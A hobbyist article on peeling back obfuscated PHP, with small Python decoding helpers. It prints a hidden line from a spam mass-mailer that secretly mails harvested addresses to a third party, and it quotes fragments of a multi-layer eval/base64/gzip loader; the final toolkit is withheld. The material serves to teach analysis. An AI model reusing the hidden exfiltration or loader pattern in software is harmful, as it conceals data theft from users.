De-Obfuscating Scripting Languages

by Cliff

Imagine you're a lame web designer...

How do you protect your precious HTML, as if nobody's ever seen HTML before?  Imagine you're adding some kind of validation to a web page, but you don't want the validation algorithm to be publicly visible.  Or maybe you're trying to hide your malicious code in an otherwise innocuous page.

You use obfuscation.

Obfuscation doesn't make code impossible to read; it just makes reading it a pain in the ass, and not worth bothering with for the average user.  The great thing about scripting languages is that they are interpreted plaintext.  In order for the script to run, it has to be turned back into readable source at some stage - all you need to do is de-obfuscate it, and read what the author didn't want you to read.  The more someone doesn't want me to read something, the more curious I become!

Common scripting languages include PHP, VBScript, and JavaScript.

Each has its own syntax and uses: PHP runs on the server but not in a browser, JavaScript can run on either, and VBScript is most suited to server-side execution.  But they share lots of common programming constructs.  The one instruction nearly every code obfuscator uses is eval(), which works just about the same in each of these languages.

eval("string") executes whatever code the string contains.  That code may be in cleartext, or it may itself be a short program that unpacks the real cleartext using other functions, which vary with the scripting language used.
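One way to see what an eval() would run, without running it, is to swap the eval for a print before the script goes anywhere near an interpreter.  Here is a minimal sketch of that swap.  It is written in Python rather than PHP so the suspect script is only ever handled as text.  The function name defang_eval is made up for illustration, and the regular expression is deliberately naive:

```python
import re

# Matches the word "eval" followed by an opening parenthesis.
EVAL_CALL = re.compile(r"\beval\s*\(")


def defang_eval(source: str) -> str:
    """Return the script text with every eval( call rewritten to print(.

    This is only a text substitution; it does not parse PHP, so an "eval("
    inside a string literal or a comment gets rewritten too.
    """
    return EVAL_CALL.sub("print(", source)


sample = 'eval(base64_decode("aGVsbG8="));'
print(defang_eval(sample))
```

The rewritten line still has to be run by something to show the hidden code, so this only helps on a box you don't mind losing.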

Here's a simple, real-life sample I took from a PHP script.

This PHP script was called the "Yoga0400 Mass Mailer."  It was forwarded to me by someone who found a copy on their honeypot.  It was a generic PHP HTML interface for the box's own SMTP server, and it looks as if it was handed out freely to spammers to use as a service to humanity.  Some service - it contains a line:

echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));

Which made me curious - what did it do that someone who gives away a spamming script might want to keep a secret?

This was an easy one, and feel free to play along at home...  I looked up PHP's base64_decode() function, and thanks to the excellent php-functions.com and similar sites, I was able to decode the string in a blink.

Simply copy and paste the string: bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7

Into the base64_decode() box and hit "Submit".

You should see the result:

mail("grofi_hack@hotmail.com", $subj98, $msg, $message, $ra44);

This secret script would take a copy of all the email addresses the spammer was using, and send it to grofi_hack@hotmail.com - grofi_hack was using this giveaway tool to build up his own spam lists!

No honor amongst thieves.  For what it's worth, I believe Hotmail killed that address off a while ago.  It's very hard to shed a tear for someone stealing a spam list from another spammer; either way it's the innocent inboxes that get hosed!

This was an example of the base64_decode() function in PHP being used to obfuscate cleartext code.
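If you'd rather not paste strings into a web form, the same decode is a few lines in most languages.  A minimal sketch in Python (an arbitrary choice here, picked so the PHP is never executed), using only the standard library's base64 module and the string quoted above:

```python
import base64

# The string from the mass mailer's eval() line, copied verbatim.
encoded = "bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"

# b64decode returns bytes; the hidden code here is plain ASCII.
decoded = base64.b64decode(encoded).decode("ascii")
print(decoded)
```

This prints the same mail(...) line shown above.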

Another commonly used function is gzuncompress(), another layer of trying to hide what happens beneath the covers.
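PHP's gzuncompress() undoes gzcompress(), which produces ordinary zlib-format data, so this layer can be peeled outside PHP as well.  A minimal sketch in Python, with a stand-in payload invented for the demo - the helper name peel and the sample code are not from any real script:

```python
import base64
import zlib


def peel(encoded: str) -> str:
    """Undo one base64_decode() + gzuncompress() layer."""
    compressed = base64.b64decode(encoded)
    # gzuncompress() expects zlib-format data, which is what
    # zlib.decompress() handles by default.
    return zlib.decompress(compressed).decode("latin-1")


# Stand-in payload built here for the demo, compressed at the maximum level.
hidden = 'echo "nothing to see here";'
wrapped = base64.b64encode(zlib.compress(hidden.encode("latin-1"), 9)).decode("ascii")

print(wrapped[:2])   # the zlib header bytes, as they look after base64
print(peel(wrapped))
```

A handy tell: zlib data compressed at the maximum level starts with the bytes 0x78 0xDA, which come out of base64 as "eN".  A long blob starting with "eN" is very likely this kind of wrapper.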

For instance, here are three very innocent looking lines.  I've snipped them heavily here, because one of the three is very, very, very long indeed - that one expression alone would have filled several pages of 2600.

It's the obfuscated bit:

// This file is protected by copyright law and provided under license.
// Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=42896;
eval(gzuncompress(base64_decode('eNplj8duwkAYhf-SNIP ABOUT 300 CHARS-T47xDRfgD5Al8g')));
return;

GYQYAfsKI0EW/cBaMtxrEmJqy6xkdCvAsLRv6IViHHeQFVmVAsp-SNIP ABOUT 40 KB OF SIMILAR STUFF-7G/T/ntYYFI==

The first two lines are easy - someone prohibiting me from seeing what code they want to run on my computer?  I ignored them, so sue me.

Next we have a few variable declarations in a single line.  Unkindly, the person obfuscating the code used a real mix of characters here - Courier New renders them all the same (see above), so let's try a different font.

Wingdings shows us what's going on here rather well: 👓🏳🏳🏳📁🏳📁🏳📁📁

What looks like $OOO0O0O00 is actually a mix of capital O's and zeroes.  Slippery.
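A font change is not the only way to tell the two characters apart.  As a minimal sketch (in Python, with a made-up helper name spell_out), lower-casing the letter O leaves the zeroes standing out in just about any font:

```python
def spell_out(name: str) -> str:
    """Rewrite capital letter O as 'o' so it can't be confused with digit 0."""
    return name.replace("O", "o")


# The three variable names from the obfuscated script.
names = ["$OOO0O0O00", "$O00O00O00", "$OO00O0000"]
for name in names:
    print(name, "->", spell_out(name))
```

The three names come out as $ooo0o0o00, $o00o00o00, and $oo00o0000, which are at least tolerable to compare by eye.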

Of course, the second and third variables are different mixes of O's and zeroes.  This is clearly going to be a battle, lucky I'm so obstinate!  I did a bit of renaming myself:

//$OOO0O0O00=__FILE__;
$file=__FILE__;
//$O00O00O00=__LINE__;
$line=47;
//$OO00O0000=42896;
$offset=42896;

I figured $file, $line, and $offset would be more useful names initially to get me rolling, and so used search and replace, and not for the last time.
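Search and replace by hand gets risky when the names differ by a single character.  A minimal sketch of a safer rename, in Python: it matches whole PHP variable names only, so one look-alike can never be replaced inside another.  The readable names are the ones chosen above; the function name rename_variables is made up for this sketch:

```python
import re

# Obfuscated names from the script, mapped to the readable names used above.
RENAMES = {
    "$OOO0O0O00": "$file",
    "$O00O00O00": "$line",
    "$OO00O0000": "$offset",
}

# Match a whole PHP variable: "$" plus identifier characters.
VARIABLE = re.compile(r"\$[A-Za-z0-9_]+")


def rename_variables(source: str) -> str:
    """Replace known obfuscated variable names, leaving unknown ones alone."""
    return VARIABLE.sub(lambda m: RENAMES.get(m.group(0), m.group(0)), source)


line = "$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=42896;"
print(rename_variables(line))
```

Names that are not in the table pass through untouched, so new ones can be added to the table as they turn up in later layers.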

Particularly neat was the use of __FILE__ and __LINE__, which meant that editing the file (and so moving the code to a different line) would break it, hence the hard-coded value for $line.

I worked out why it was so important, and what the line number would be once I'd tidied the code up.  This was a very clever obfuscation!

Continuing, I tidied the code a bit:

$a1='eNplj8duwkAYhF/G0u4qRlmI44AsH+idpbdL5PK7GBu7LsDTBxREhKKZ02jmk0ZilFJ2E9WdOIEIS4yx30BG3EREKzw/AFwqSexevJs4LqQCS8+pXKYVhWj/YoXWVKLdiI+l7l6zyIrDhIMQ2DQEqMq3DVZsAxYpTzl2OBj2C6JKiYzaUQr8EmfF0Zv3dsPJhq2WdaNhNq2W3XG6bt8fHEbBOJwms9NCrPPteX+l5cqH8ql+VWtv7zq5Ub3RbLU73V5/MByNJ2w6my+Wq/Vmu9sbpmWD43rA+4RiEUZycuEizvDhfXhiIEKJBbgT47xDRfgD5Al8g';
$a2=base64_decode($a1);
$a3=gzuncompress($a2);

Next I did the base64_decode(), then, using a 30-day trial of a PHP debugger, did the gzuncompress() on the result.

What I got was:

//eval sequence $a3
$O000O0O00=fopen($OOO0O0O00, 'rb');
while(--$O00O00O00) fgets($O000O0O00, 1024);
fgets($O000O0O00, 4096);
$OO00O00O0=gzuncompress(base64_decode(strtr(fread($O000O0O00, 480), 'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));
eval($OO00O00O0);

Cheeky!  More of the O's and zeroes.  Reformatted and renamed...

// next lines address the data lines
$stream1=fopen($file, 'rb');
while(--$line)fgets($stream1,1024);
fgets($stream1,4096);
$b1=fread($stream1,480);
//$b1='W/-LOTS OF SNIPPAGE-//8lsR3kgX3JRrh9Em';
$b2=strtr($b1,'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/');
$b3=base64_decode($b2);
$b4=gzuncompress($b3);

So the original third line comes into play - the 40 kB is all data for the routine obfuscated in the second line.

The script opens its own file, reads the data line, uses strtr() to translate characters, then performs another base64_decode() and gzuncompress() on the resulting data.
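The strtr() step is just a substitution cipher laid over the base64 alphabet, and the whole stage can be reproduced outside PHP.  A minimal sketch in Python, using the two alphabets from the listing above.  The data is a stand-in scrambled the same way for the demo, not the real 40 kB, and the name decode_stage is made up:

```python
import base64
import zlib

# The two alphabets from the strtr() call above.
SCRAMBLED = "EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# PHP's strtr() ignores the extra trailing "=" in the longer string, so
# only the first 64 characters matter; "=" padding passes through as-is.
TO_STANDARD = str.maketrans(SCRAMBLED, STANDARD)
TO_SCRAMBLED = str.maketrans(STANDARD, SCRAMBLED)


def decode_stage(data: str) -> str:
    """strtr() back to standard base64, then base64_decode(), then gzuncompress()."""
    standard_b64 = data.translate(TO_STANDARD)
    return zlib.decompress(base64.b64decode(standard_b64)).decode("latin-1")


# Stand-in data for the demo, scrambled with the same alphabet.
secret = "echo 'stage two';"
blob = base64.b64encode(zlib.compress(secret.encode("latin-1"))).decode("ascii")
scrambled = blob.translate(TO_SCRAMBLED)

print(sorted(SCRAMBLED) == sorted(STANDARD))  # same 64 characters, reordered
print(decode_stage(scrambled))
```

For what it's worth, under this table the characters "GY" translate to "eN", the usual start of base64-encoded zlib data.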

Interestingly, here we see evidence that this has been obfuscated with a tool of some sort - the strtr() string starts with "Enteryou", which is quite possibly the start of "Enter your seeding string here" or some similar default value.

Not that anyone but a madman would roll this stuff by hand, of course.  Or reverse engineer it...

By now, I was feeling mightily proud of myself.  I was clearly getting closer.

$b4 contained another blooming mash of O's and zeroes, base64_decode(), gzuncompress(), fread(), strtr(), and a new one for me, ereg_replace(), which when tidied gave us:

$c2=fread($stream1,$offset);
$c3=strtr($c2, 'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/');
$c4=base64_decode($c3);
$c5=gzuncompress($c4);
//$c1=ereg_replace('__FILE__',"'".$file."'",$c5);
$c6=strlen($c5);

Now I wondered if I was going in circles.  Earlier I had been, for 90 minutes.

The code is so cleverly recursive that if you miscount a position, etc., you literally end up in a loop.  Utterly brilliant, but that meant the code had to succumb to me or kill me trying.

print ($c6);
print ($c5); //dump the secret script
fclose($stream1);
return;

I have to admit, my worksheet was getting crazily messy by now, and some of my workings may well appear to be missing steps - this article is about the principle though, not this script.

But this was it, I now had the final script, hidden deep inside some crazy obfuscated code.

The first thing AVG did when I tried to save the file was to panic.  I knew I'd hit paydirt.  And indeed it was an exploitation toolkit designed to run on UNIX and Linux variants, very cute indeed.

I'm afraid I won't list the actual code here.  It's not relevant and it's not nice, and frankly I've lost a chunk of it.

But this journey is typical of the work you have to put into seemingly impossible de-obfuscation of scripting languages.

They're usually obfuscated with software tools, they're usually several layers deep, and they try every kind of diversion they can to throw you off the scent, into loops, etc.  I learned more about the internals of PHP de-obfuscating this code than any tutorial has ever taught me.
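When every layer has the same shape, the peeling can be automated.  A minimal sketch in Python, assuming the plain eval(gzuncompress(base64_decode('...'))); wrapper and nothing fancier.  The helper names wrap and peel_all are invented for the demo, the nested sample is built on the spot, and the layer cap is there so a mistake can't send you round in circles forever:

```python
import base64
import re
import zlib

# One common wrapper shape: eval(gzuncompress(base64_decode('...')));
WRAPPER = re.compile(
    r"eval\(gzuncompress\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)\);"
)


def wrap(code: str) -> str:
    """Build one obfuscation layer (demo helper, not from any real tool)."""
    blob = base64.b64encode(zlib.compress(code.encode("latin-1"))).decode("ascii")
    return "eval(gzuncompress(base64_decode('" + blob + "')));"


def peel_all(code: str, max_layers: int = 20) -> tuple:
    """Peel wrapper layers until none is left or max_layers is reached."""
    layers = 0
    while layers < max_layers:
        match = WRAPPER.fullmatch(code.strip())
        if match is None:
            break
        code = zlib.decompress(base64.b64decode(match.group(1))).decode("latin-1")
        layers += 1
    return code, layers


nested = wrap(wrap(wrap("echo 'finally';")))
plain, depth = peel_all(nested)
print(depth, plain)
```

Real tools mix in strtr() tables, file offsets, and renamed variables between layers, so expect to stop and adjust the pattern by hand at each new trick.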

There are other techniques in use to try to protect scripts - you might find scripts referenced in a client-side include, for instance, in the hope that as they don't appear in your browser, you can't see the script.

Try your browser cache for these scripts.  JavaScript has its share of obfuscated code too - again you'll see string replacements, offsets, loops within loops, obscure programming constructs, anything to throw you off the scent - but remember, it will always give you a cleartext version of the script in the end, otherwise the engine couldn't run it.

The best thing you can do from here is to find some obfuscated code, and have a go yourself - it's quite rewarding when you finally see what someone has worked so hard to stop you from seeing.

Often, it's quite mundane - some idiot has thought you really want to copy his crappy alert('Page Protected by xxx') script - but sometimes you hit the weird and wonderful stuff, and it's quite informative.

Well-obfuscated code will not give up its secrets in a regular debugger either - taking it out of context can cause problems, and executing a whole line at a time prevents you from stepping through every iteration of an obfuscation.

You need to pull the code to pieces to see what happens at the heart.  Work methodically, evaluate terms one at a time, rename stupidly named variables, but be sensitive to any environment variables like __LINE__ which can trip you up.
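To see why __LINE__ bites, here is a minimal model of a loader that finds its data by counting lines in its own file, roughly as the fgets()/fread() sequence quoted earlier does.  It is a sketch in Python with invented file contents - the function name read_payload and the four-line sample are assumptions, not the real script:

```python
import io


def read_payload(script: bytes, line_no: int, size: int) -> bytes:
    """Mimic the loader: skip line_no - 1 lines, skip one more, read size bytes."""
    stream = io.BytesIO(script)
    # while(--$line) fgets($f, 1024);  fgets() returns at most length - 1 bytes
    for _ in range(line_no - 1):
        stream.readline(1023)
    # fgets($f, 4096);  discards the rest of the loader's own line
    stream.readline(4095)
    # fread($f, size);
    return stream.read(size)


# A made-up four-line file: the loader sits on line 3, the data on line 4.
original = b"<?php\n// header\n$loader;\nPAYLOAD-DATA\n"
edited = b"// my notes\n" + original  # one extra line pushes everything down

print(read_payload(original, 3, 12))
print(read_payload(edited, 3, 12))   # stale line number: reads the wrong bytes
print(read_payload(edited, 4, 12))   # corrected line number
```

Add a single comment line while tidying and the stale line number lands the read in the middle of the loader instead of the data, which is exactly the kind of silent failure that costs 90 minutes.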

Each step reveals more puzzles to solve, but in the end you can discover some of the guilty secrets of the web!  It's a good hobby.

Maybe post some of your steps, discoveries, and gotchas to 2600 as well, so we can all learn a bit more.

Thank you for your attention and interest.  I hope this has inspired you somehow.
